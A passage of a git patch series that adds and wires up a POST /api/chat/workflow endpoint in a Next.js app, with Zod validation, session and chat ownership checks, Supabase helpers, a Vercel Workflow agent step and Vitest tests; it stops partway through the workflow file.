From d20ac4e48895e45bac06dd93195513c9ef7da999 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 09:24:00 -0500 Subject: [PATCH 1/3] feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): add POST /api/chat/workflow route stub Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed chat endpoint documented in recoupable/docs#221. The stub validates the full request contract (auth, body, session/chat ownership, sandbox active) and returns a hardcoded UIMessage stream with an x-workflow-run-id: stub- header — so the chat-side team can integrate against the real response shape today while the workflow itself is being ported from open-agents in follow-up PRs. Files: - app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS - lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat ownership → sandbox check → stub UIMessage stream - lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI ChatWorkflowRequest (messages, chatId, sessionId, optional context.contextLimit) Status codes implemented (match contract docs): - 200 — UIMessage stream + x-workflow-run-id header - 400 — invalid JSON / invalid body / "Sandbox not initialized" - 401 — validateAuthContext passthrough - 403 — session not owned by API key's account - 404 — session or chat not found (incl. chat under different session) - 500 — selectSessions returned null (DB error) 409 (duplicate workflow run for chat) is deferred to the wire-up PR that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet. Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): address PR review — SRP/DRY cleanup Two review fixes per PR feedback: 1. SRP/DRY — drop the local errorResponse helper from handleChatWorkflowStream.ts; use the shared lib/networking/errorResponse and lib/zod/validationErrorResponse helpers instead. 2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts into the validator. Rename validateChatWorkflowBody → validateChatWorkflow so it accepts a full NextRequest (like the existing validateChatRequest) and returns an auth-augmented body (accountId/orgId/authToken). The handler now opens with a single `validateChatWorkflow(request)` call. Tests reshaped to match new seams: - Validator test mocks validateAuthContext only - Handler test mocks validateChatWorkflow (the new seam) - Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed into a single "validator short-circuit passes through" test — both are now the validator's responsibility, not the handler's 22/22 new tests green; full suite 2900/2900 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) * chore: revert unrelated local changes accidentally swept into PR Previous commit (9262f650) used `git add -A` which picked up local Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak that aren't part of this PR's scope. Removing them now so the PR diff stays scoped to the chat-workflow refactor. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- app/api/chat/workflow/route.ts | 34 ++++ .../handleChatWorkflowStream.test.ts | 165 ++++++++++++++++++ .../__tests__/validateChatWorkflow.test.ts | 142 +++++++++++++++ lib/chat/handleChatWorkflowStream.ts | 61 +++++++ lib/chat/validateChatWorkflow.ts | 61 +++++++ 5 files changed, 463 insertions(+) create mode 100644 app/api/chat/workflow/route.ts create mode 100644 lib/chat/__tests__/handleChatWorkflowStream.test.ts create mode 100644 lib/chat/__tests__/validateChatWorkflow.test.ts create mode 100644 lib/chat/handleChatWorkflowStream.ts create mode 100644 lib/chat/validateChatWorkflow.ts diff --git a/app/api/chat/workflow/route.ts b/app/api/chat/workflow/route.ts new file mode 100644 index 000000000..19445c03b --- /dev/null +++ b/app/api/chat/workflow/route.ts @@ -0,0 +1,34 @@ +import type { NextRequest } from "next/server"; +import { NextResponse } from "next/server"; +import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; +import { handleChatWorkflowStream } from "@/lib/chat/handleChatWorkflowStream"; + +export const maxDuration = 800; + +/** + * OPTIONS handler for CORS preflight requests. + * + * @returns A NextResponse with CORS headers. + */ +export async function OPTIONS() { + return new NextResponse(null, { + status: 200, + headers: getCorsHeaders(), + }); +} + +/** + * POST /api/chat/workflow + * + * Streams a sandbox-driven agent loop (Vercel Workflow) for an existing + * session + chat. Currently returns a hardcoded UIMessage stream stub — + * the workflow is wired up in a follow-up PR. + * + * Contract: https://developers.recoupable.com/api-reference/chat/workflow + * + * @param request - The incoming NextRequest. + * @returns A streaming Response (200) or a NextResponse error. + */ +export async function POST(request: NextRequest): Promise { + return handleChatWorkflowStream(request); +} diff --git a/lib/chat/__tests__/handleChatWorkflowStream.test.ts b/lib/chat/__tests__/handleChatWorkflowStream.test.ts new file mode 100644 index 000000000..c61911be8 --- /dev/null +++ b/lib/chat/__tests__/handleChatWorkflowStream.test.ts @@ -0,0 +1,165 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { NextRequest, NextResponse } from "next/server"; + +import { handleChatWorkflowStream } from "@/lib/chat/handleChatWorkflowStream"; +import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; +import { selectSessions } from "@/lib/supabase/sessions/selectSessions"; +import { selectChats } from "@/lib/supabase/chats/selectChats"; +import { isSandboxActive } from "@/lib/sandbox/isSandboxActive"; + +vi.mock("@/lib/chat/validateChatWorkflow", () => ({ + validateChatWorkflow: vi.fn(), +})); +vi.mock("@/lib/supabase/sessions/selectSessions", () => ({ + selectSessions: vi.fn(), +})); +vi.mock("@/lib/supabase/chats/selectChats", () => ({ + selectChats: vi.fn(), +})); +vi.mock("@/lib/sandbox/isSandboxActive", () => ({ + isSandboxActive: vi.fn(), +})); +vi.mock("@/lib/networking/getCorsHeaders", () => ({ + getCorsHeaders: vi.fn(() => ({ "Access-Control-Allow-Origin": "*" })), +})); + +const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa"; +const OTHER_ACCOUNT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb"; +const SESSION_ID = "22222222-2222-2222-2222-222222222222"; +const CHAT_ID = "11111111-1111-1111-1111-111111111111"; + +function makeRequest(): NextRequest { + return new NextRequest("http://localhost/api/chat/workflow", { + method: "POST", + headers: { "x-api-key": "test-key", "content-type": "application/json" }, + body: JSON.stringify({ messages: [], chatId: CHAT_ID, sessionId: SESSION_ID }), + }); +} + +function mockValidatedRequest(overrides: Partial<{ accountId: string }> = {}) { + vi.mocked(validateChatWorkflow).mockResolvedValue({ + messages: [], + chatId: CHAT_ID, + sessionId: SESSION_ID, + accountId: overrides.accountId ?? ACCOUNT_ID, + orgId: null, + authToken: "test-key", + }); +} + +function mockOwnedSessionWithActiveSandbox() { + mockValidatedRequest(); + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, + ]); + vi.mocked(selectChats).mockResolvedValue([{ id: CHAT_ID, session_id: SESSION_ID } as never]); + vi.mocked(isSandboxActive).mockReturnValue(true); +} + +describe("handleChatWorkflowStream (stub)", () => { + beforeEach(() => { + vi.clearAllMocks(); + }); + + describe("validation short-circuits", () => { + it("returns the validator's short-circuit response unchanged (e.g. 401)", async () => { + const authError = NextResponse.json( + { status: "error", error: "Unauthorized" }, + { status: 401 }, + ); + vi.mocked(validateChatWorkflow).mockResolvedValue(authError); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(401); + }); + + it("returns the validator's 400 unchanged (e.g. invalid body)", async () => { + const badBody = NextResponse.json( + { status: "error", error: "Invalid JSON body" }, + { status: 400 }, + ); + vi.mocked(validateChatWorkflow).mockResolvedValue(badBody); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(400); + }); + }); + + describe("session / chat ownership", () => { + beforeEach(() => mockValidatedRequest()); + + it("returns 404 when the session does not exist", async () => { + vi.mocked(selectSessions).mockResolvedValue([]); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(404); + }); + + it("returns 500 when selectSessions errors (returns null)", async () => { + vi.mocked(selectSessions).mockResolvedValue(null); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(500); + }); + + it("returns 403 when the session is owned by a different account", async () => { + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: OTHER_ACCOUNT_ID, sandbox_state: { ready: true } } as never, + ]); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(403); + }); + + it("returns 400 'Sandbox not initialized' when sandbox is inactive", async () => { + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: null } as never, + ]); + vi.mocked(isSandboxActive).mockReturnValue(false); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(400); + const body = await res.json(); + expect(body.error).toMatch(/sandbox/i); + }); + + it("returns 404 when the chat does not exist", async () => { + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, + ]); + vi.mocked(isSandboxActive).mockReturnValue(true); + vi.mocked(selectChats).mockResolvedValue([]); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(404); + }); + + it("returns 404 when chat exists but belongs to a different session", async () => { + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, + ]); + vi.mocked(isSandboxActive).mockReturnValue(true); + vi.mocked(selectChats).mockResolvedValue([ + { id: CHAT_ID, session_id: "different-session" } as never, + ]); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(404); + }); + }); + + describe("success (stub response)", () => { + beforeEach(() => mockOwnedSessionWithActiveSandbox()); + + it("returns 200 with text/event-stream content type", async () => { + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(200); + expect(res.headers.get("content-type") ?? "").toMatch(/text\/event-stream/); + }); + + it("sets an x-workflow-run-id response header starting with stub-", async () => { + const res = await handleChatWorkflowStream(makeRequest()); + const runId = res.headers.get("x-workflow-run-id"); + expect(runId).toBeTruthy(); + expect(runId!.startsWith("stub-")).toBe(true); + }); + + it("emits a stream body that includes the stub assistant text", async () => { + const res = await handleChatWorkflowStream(makeRequest()); + const text = await res.text(); + expect(text).toContain("Hello from /api/chat/workflow"); + }); + }); +}); diff --git a/lib/chat/__tests__/validateChatWorkflow.test.ts b/lib/chat/__tests__/validateChatWorkflow.test.ts new file mode 100644 index 000000000..8eb9457c2 --- /dev/null +++ b/lib/chat/__tests__/validateChatWorkflow.test.ts @@ -0,0 +1,142 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { NextRequest, NextResponse } from "next/server"; + +import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; +import { validateAuthContext } from "@/lib/auth/validateAuthContext"; + +vi.mock("@/lib/auth/validateAuthContext", () => ({ + validateAuthContext: vi.fn(), +})); + +const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa"; +const CHAT_ID = "11111111-1111-1111-1111-111111111111"; +const SESSION_ID = "22222222-2222-2222-2222-222222222222"; + +const validBody = { + messages: [{ id: "m-1", role: "user", parts: [{ type: "text", text: "hi" }] }], + chatId: CHAT_ID, + sessionId: SESSION_ID, +}; + +function makeRequest(body: unknown = validBody): NextRequest { + return new NextRequest("http://localhost/api/chat/workflow", { + method: "POST", + headers: { "x-api-key": "k", "content-type": "application/json" }, + body: typeof body === "string" ? body : JSON.stringify(body), + }); +} + +function mockAuthOk() { + vi.mocked(validateAuthContext).mockResolvedValue({ + accountId: ACCOUNT_ID, + orgId: null, + authToken: "k", + }); +} + +describe("validateChatWorkflow", () => { + beforeEach(() => vi.clearAllMocks()); + + describe("valid input", () => { + beforeEach(() => mockAuthOk()); + + it("returns the validated body augmented with accountId / orgId / authToken", async () => { + const result = await validateChatWorkflow(makeRequest()); + expect(result).not.toBeInstanceOf(NextResponse); + if (result instanceof NextResponse) return; + expect(result.chatId).toBe(CHAT_ID); + expect(result.sessionId).toBe(SESSION_ID); + expect(result.messages).toEqual(validBody.messages); + expect(result.accountId).toBe(ACCOUNT_ID); + expect(result.orgId).toBe(null); + expect(result.authToken).toBe("k"); + }); + + it("accepts an optional context.contextLimit integer", async () => { + const result = await validateChatWorkflow( + makeRequest({ ...validBody, context: { contextLimit: 50 } }), + ); + expect(result).not.toBeInstanceOf(NextResponse); + if (result instanceof NextResponse) return; + expect(result.context?.contextLimit).toBe(50); + }); + + it("accepts an empty messages array", async () => { + const result = await validateChatWorkflow(makeRequest({ ...validBody, messages: [] })); + expect(result).not.toBeInstanceOf(NextResponse); + }); + }); + + describe("invalid body", () => { + it("returns 400 when JSON is malformed", async () => { + const req = new NextRequest("http://localhost/api/chat/workflow", { + method: "POST", + headers: { "x-api-key": "k", "content-type": "application/json" }, + body: "{not-json", + }); + const result = await validateChatWorkflow(req); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when chatId is missing", async () => { + const { chatId: _omit, ...rest } = validBody; + const result = await validateChatWorkflow(makeRequest(rest)); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when sessionId is missing", async () => { + const { sessionId: _omit, ...rest } = validBody; + const result = await validateChatWorkflow(makeRequest(rest)); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when messages is not an array", async () => { + const result = await validateChatWorkflow(makeRequest({ ...validBody, messages: "nope" })); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when chatId is empty string", async () => { + const result = await validateChatWorkflow(makeRequest({ ...validBody, chatId: "" })); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when context.contextLimit is not an integer", async () => { + const result = await validateChatWorkflow( + makeRequest({ ...validBody, context: { contextLimit: "fifty" } }), + ); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("does not call validateAuthContext when body validation fails", async () => { + const { chatId: _omit, ...rest } = validBody; + await validateChatWorkflow(makeRequest(rest)); + expect(validateAuthContext).not.toHaveBeenCalled(); + }); + }); + + describe("auth", () => { + it("returns the auth short-circuit response when validateAuthContext rejects", async () => { + const authError = NextResponse.json( + { status: "error", error: "Unauthorized" }, + { status: 401 }, + ); + vi.mocked(validateAuthContext).mockResolvedValue(authError); + const result = await validateChatWorkflow(makeRequest()); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(401); + }); + }); +}); diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts new file mode 100644 index 000000000..137f699cb --- /dev/null +++ b/lib/chat/handleChatWorkflowStream.ts @@ -0,0 +1,61 @@ +import { NextRequest, NextResponse } from "next/server"; +import { createUIMessageStream, createUIMessageStreamResponse } from "ai"; +import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; +import { selectSessions } from "@/lib/supabase/sessions/selectSessions"; +import { selectChats } from "@/lib/supabase/chats/selectChats"; +import { isSandboxActive } from "@/lib/sandbox/isSandboxActive"; +import { errorResponse } from "@/lib/networking/errorResponse"; +import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; +import generateUUID from "@/lib/uuid/generateUUID"; + +/** + * Handles POST /api/chat/workflow. + * + * Stub implementation: delegates auth + body validation to validateChatWorkflow, + * verifies ownership of the referenced session + chat, confirms the session's + * sandbox is active, then returns a hardcoded UIMessage stream with an + * `x-workflow-run-id` header. The Vercel Workflow that will eventually drive + * the agent loop is wired up in a follow-up PR — this stub exists so clients + * can integrate against the contract documented at + * /api-reference/chat/workflow. + * + * @param request - The incoming NextRequest + * @returns A streaming Response (200) or a NextResponse error. + */ +export async function handleChatWorkflowStream(request: NextRequest): Promise { + const validated = await validateChatWorkflow(request); + if (validated instanceof NextResponse) return validated; + + const sessions = await selectSessions({ id: validated.sessionId }); + if (sessions === null) return errorResponse("Internal server error", 500); + const session = sessions[0]; + if (!session) return errorResponse("Session not found", 404); + if (session.account_id !== validated.accountId) return errorResponse("Forbidden", 403); + if (!isSandboxActive(session)) return errorResponse("Sandbox not initialized", 400); + + const chats = await selectChats({ id: validated.chatId }); + const chat = chats[0]; + if (!chat || chat.session_id !== validated.sessionId) { + return errorResponse("Chat not found", 404); + } + + const runId = `stub-${generateUUID()}`; + + const stream = createUIMessageStream({ + generateId: generateUUID, + execute: ({ writer }) => { + const id = generateUUID(); + writer.write({ type: "text-start", id }); + writer.write({ type: "text-delta", id, delta: "Hello from /api/chat/workflow" }); + writer.write({ type: "text-end", id }); + }, + }); + + return createUIMessageStreamResponse({ + stream, + headers: { + ...getCorsHeaders(), + "x-workflow-run-id": runId, + }, + }); +} diff --git a/lib/chat/validateChatWorkflow.ts b/lib/chat/validateChatWorkflow.ts new file mode 100644 index 000000000..4fd8e6c66 --- /dev/null +++ b/lib/chat/validateChatWorkflow.ts @@ -0,0 +1,61 @@ +import type { NextRequest } from "next/server"; +import { NextResponse } from "next/server"; +import { z } from "zod"; +import { validateAuthContext } from "@/lib/auth/validateAuthContext"; +import { errorResponse } from "@/lib/networking/errorResponse"; +import { validationErrorResponse } from "@/lib/zod/validationErrorResponse"; + +export const chatWorkflowBodySchema = z.object({ + messages: z.array(z.any()), + chatId: z.string().min(1, "chatId is required"), + sessionId: z.string().min(1, "sessionId is required"), + context: z + .object({ + contextLimit: z.number().int("contextLimit must be an integer"), + }) + .optional(), +}); + +export type ChatWorkflowBody = z.infer; + +export type ChatWorkflowRequest = ChatWorkflowBody & { + accountId: string; + orgId: string | null; + authToken?: string; +}; + +/** + * Validates a POST /api/chat/workflow request end-to-end: parses the JSON + * body, validates it against the schema, and runs auth via + * validateAuthContext. Returns a NextResponse error short-circuit (400/401/403) + * or the typed body augmented with the authenticated accountId / orgId / token. + * + * @param request - The incoming NextRequest. + * @returns A NextResponse error or the validated, auth-augmented request. + */ +export async function validateChatWorkflow( + request: NextRequest, +): Promise { + let rawBody: unknown; + try { + rawBody = await request.json(); + } catch { + return errorResponse("Invalid JSON body", 400); + } + + const parsed = chatWorkflowBodySchema.safeParse(rawBody); + if (!parsed.success) { + const firstError = parsed.error.issues[0]; + return validationErrorResponse(firstError.message, firstError.path); + } + + const auth = await validateAuthContext(request); + if (auth instanceof NextResponse) return auth; + + return { + ...parsed.data, + accountId: auth.accountId, + orgId: auth.orgId, + authToken: auth.authToken, + }; +} From f9efbea9e269bdb6980656e5e35e483b30705d66 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 12:07:35 -0500 Subject: [PATCH 2/3] feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow agent loop. Stub run-ids (`stub-`) are replaced with real ones (`wrun_`) emitted by the workflow runtime. Tools are still NOT wired — the workflow runs streamText with the gateway model + Recoup custom instructions only. Sandbox tool surface comes in a follow-up PR. What's now plumbed end-to-end: - validateChatWorkflow → session+chat ownership → sandbox active → reconcile existing active_stream_id (resume / 409 / fall-through) → refresh lifecycle activity → fire-and-forget persist user message → start runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) → return run.getReadable() with x-workflow-run-id header New helpers (Supabase): - compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id - touchChat — bump chats.updated_at - updateChat — generic partial update mirroring updateSession's shape - createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert - isFirstChatMessage — true iff exactly one row exists matching messageId New helpers (chat/recoupable): - extractOrgId — `org--` → uuid (lowercased) - agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt - persistLatestUserMessage — fire-and-forget user msg + title-from-first-80 - reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop New workflow files: - app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper - app/workflows/runAgentStep.ts — `"use step"`, single streamText turn Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest + 6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored). Full suite: 2946/2946 pass, lint clean. Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools). Without tools, `finishReason` is always "stop" after one turn — the runAgentWorkflow loop shape is in place but only iterates once today. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): address PR review — structural + P1/P2 fixes Sweetman structural feedback (KISS / OCP): - Move workflow files: app/workflows/runAgent{Workflow,Step}.ts → app/lib/workflows/runAgent{Workflow,Step}.ts - Generic Supabase helpers + domain wrappers: - Generic `updateChat({filter, updates})` with optional CAS predicate on active_stream_id. Subsumes compareAndSetChatActiveStreamId and touchChat (both deleted). - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces domain-specific isFirstChatMessage. The "is earliest?" check now lives in persistLatestUserMessage where it belongs. - Rename createChatMessageIfNotExists → `upsertChatMessage` with a discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so callers can tell duplicates from DB errors. - Extract resume-stream block from handler into `maybeResumeChatStream.ts` (OCP — handler stays small, resume logic grows independently). cubic P1 fixes: - CAS-before-start: handler now claims `active_stream_id` with a `pending-` placeholder BEFORE calling start(workflow). Closes the race where two requests could both bill the model before one lost the CAS. After start(), promotes the placeholder to the real run id. - updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}` so callers distinguish "race lost" (rowsUpdated:0) from DB errors. - reconcileExistingActiveStream: bare try/catch on getRun no longer clears stale active_stream_id on transient workflow API failures — we treat any uncertainty as conflict. Failed CAS-clear on a completed run also returns conflict (rather than possibly falling through to ready on a DB read error). - await getRun(runId).cancel() in handler — previously synchronous + unawaited cancellation could escape the try/catch. cubic P2 fixes: - updateChat updates parameter narrowed to `ChatMutableFields` (excludes id, session_id, created_at). - persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to body-budget = max - suffix. - runAgentStep: acquire writer once, release in finally. Per-chunk writer acquisition could leak the lock on write failure. - runAgentWorkflow: capped at a single turn until messages threading lands with tool ports (PR 4). Multi-turn loop with the same input was unsafe — log+warn if model returns tool-calls and exit. Tests reworked: 231 in the touched files all green; full suite 2949/2949; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): top-level import in reconcileExistingActiveStream The dynamic `await import("workflow/api")` inside the function body was a carry-over from open-agents — handleChatWorkflowStream.ts already top-level imports `start` and `getRun` from the same package, so there's no reason for the lib to defer. Moving to a normal top-level import for consistency. Also tightens the cancel-throws handler test to use the same deferred- rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's unhandled-rejection watcher doesn't trip on the mock setup. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): move active_stream_id CAS out of supabase lib Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific predicate logic doesn't belong in the Supabase plumbing. Restructured: - `lib/supabase/chats/updateChat.ts` now generic. The filter accepts `where: Partial>` (a generic predicate that maps to `column = value` or `column IS NULL`) so no column name is hardcoded in the Supabase lib. - `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper. Owns the "compare-and-set on active_stream_id" concept and returns a discriminated `{ok, claimed} | {ok: false, error}` result. Handler and reconcileExistingActiveStream both compose against this wrapper instead of constructing predicates inline. - Handler + reconcile updated to use the wrapper. Tests follow. 37/37 tests in touched files pass; full suite 2955/2955; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) * fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth Two production-build issues surfaced by Vercel that local pnpm test + tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's errors were all in __tests__ unrelated to this PR). 1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }` narrowing wasn't kicking in under Next.js's strict TS plugin. Switched to `if ("error" in result)` (in-operator narrowing) which reliably discriminates the union members regardless of literal-type inference quirks. 2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...) .update(...).eq(...)` + reassignment in a `for` loop (`.is()` / `.eq()` per where entry) caused "type instantiation is excessively deep" — Supabase's PostgrestFilterBuilder is heavily generic and the reassignment kept expanding the type. Rewrote as: split where map into equality matches (one `.match(obj)` call) + nullable columns (reduced with `.is(col, null)` typed back to the original builder). Both bugs were behavior-neutral — the function shape and contract are unchanged. 37/37 tests in touched files green; full suite 2955/2955; lint clean; `pnpm build` now succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- app/lib/workflows/runAgentStep.ts | 55 ++++ app/lib/workflows/runAgentWorkflow.ts | 56 ++++ .../compareAndSetChatActiveStreamId.test.ts | 51 +++ .../handleChatWorkflowStream.test.ts | 301 ++++++++++++++---- .../__tests__/maybeResumeChatStream.test.ts | 46 +++ .../persistLatestUserMessage.test.ts | 129 ++++++++ .../reconcileExistingActiveStream.test.ts | 92 ++++++ lib/chat/agentCustomInstructions.ts | 9 + lib/chat/assistantFileLinks.ts | 28 ++ lib/chat/compareAndSetChatActiveStreamId.ts | 49 +++ lib/chat/handleChatWorkflowStream.ts | 100 ++++-- lib/chat/maybeResumeChatStream.ts | 40 +++ lib/chat/persistLatestUserMessage.ts | 84 +++++ lib/chat/reconcileExistingActiveStream.ts | 56 ++++ lib/chat/recoupApiSkillPrompt.ts | 11 + lib/recoupable/__tests__/extractOrgId.test.ts | 57 ++++ lib/recoupable/extractOrgId.ts | 31 ++ .../__tests__/selectChatMessages.test.ts | 58 ++++ .../__tests__/upsertChatMessage.test.ts | 46 +++ .../chat_messages/selectChatMessages.ts | 40 +++ .../chat_messages/upsertChatMessage.ts | 37 +++ .../chats/__tests__/updateChat.test.ts | 110 +++++++ lib/supabase/chats/updateChat.ts | 86 +++++ 23 files changed, 1478 insertions(+), 94 deletions(-) create mode 100644 app/lib/workflows/runAgentStep.ts create mode 100644 app/lib/workflows/runAgentWorkflow.ts create mode 100644 lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts create mode 100644 lib/chat/__tests__/maybeResumeChatStream.test.ts create mode 100644 lib/chat/__tests__/persistLatestUserMessage.test.ts create mode 100644 lib/chat/__tests__/reconcileExistingActiveStream.test.ts create mode 100644 lib/chat/agentCustomInstructions.ts create mode 100644 lib/chat/assistantFileLinks.ts create mode 100644 lib/chat/compareAndSetChatActiveStreamId.ts create mode 100644 lib/chat/maybeResumeChatStream.ts create mode 100644 lib/chat/persistLatestUserMessage.ts create mode 100644 lib/chat/reconcileExistingActiveStream.ts create mode 100644 lib/chat/recoupApiSkillPrompt.ts create mode 100644 lib/recoupable/__tests__/extractOrgId.test.ts create mode 100644 lib/recoupable/extractOrgId.ts create mode 100644 lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts create mode 100644 lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts create mode 100644 lib/supabase/chat_messages/selectChatMessages.ts create mode 100644 lib/supabase/chat_messages/upsertChatMessage.ts create mode 100644 lib/supabase/chats/__tests__/updateChat.test.ts create mode 100644 lib/supabase/chats/updateChat.ts diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts new file mode 100644 index 000000000..352dcd265 --- /dev/null +++ b/app/lib/workflows/runAgentStep.ts @@ -0,0 +1,55 @@ +import { streamText, convertToModelMessages, type UIMessage, type UIMessageChunk } from "ai"; +import { gateway } from "@ai-sdk/gateway"; +import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions"; + +export type RunAgentStepInput = { + messages: UIMessage[]; + modelId: string; + writable: WritableStream; +}; + +/** + * One LLM turn in the chat workflow agent loop. Runs as a Vercel Workflow + * `"use step"` so that: + * + * - Sandbox-banned APIs (`fetch`, `setTimeout`, `crypto`) are legal inside. + * - The result is cached as a single durable event — replays after a crash + * do not re-bill the model. + * + * Currently emits a plain text response with no tools. Sandbox tools land in + * the follow-up PR (port `@open-harness/agent` tools + wire via + * `experimental_context`). + * + * @param input - Messages + selected model + the workflow's writable stream. + * @returns finishReason from the model run (for the workflow loop's break condition). + */ +export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishReason: string }> { + "use step"; + + console.log("[runAgentStep] start", { + modelId: input.modelId, + messageCount: input.messages.length, + }); + + const modelMessages = convertToModelMessages(input.messages); + const result = streamText({ + model: gateway(input.modelId), + system: agentCustomInstructions, + messages: modelMessages, + }); + + // Acquire the writer once and release in `finally` — re-acquiring per chunk + // (the previous shape) leaked the lock when any write threw. + const writer = input.writable.getWriter(); + try { + for await (const part of result.toUIMessageStream()) { + await writer.write(part); + } + } finally { + writer.releaseLock(); + } + + const finishReason = await result.finishReason; + console.log("[runAgentStep] finish", { finishReason }); + return { finishReason }; +} diff --git a/app/lib/workflows/runAgentWorkflow.ts b/app/lib/workflows/runAgentWorkflow.ts new file mode 100644 index 000000000..db679145a --- /dev/null +++ b/app/lib/workflows/runAgentWorkflow.ts @@ -0,0 +1,56 @@ +import { getWritable } from "workflow"; +import type { UIMessage, UIMessageChunk } from "ai"; +import { runAgentStep } from "@/app/lib/workflows/runAgentStep"; + +export type RunAgentWorkflowInput = { + messages: UIMessage[]; + chatId: string; + sessionId: string; + modelId: string; +}; + +/** + * Vercel Workflow that drives the chat agent loop. The route handler calls + * `start(runAgentWorkflow, [...])` and pipes `run.getReadable()` back to the + * client; this function writes UIMessage chunks into the workflow's writable + * via 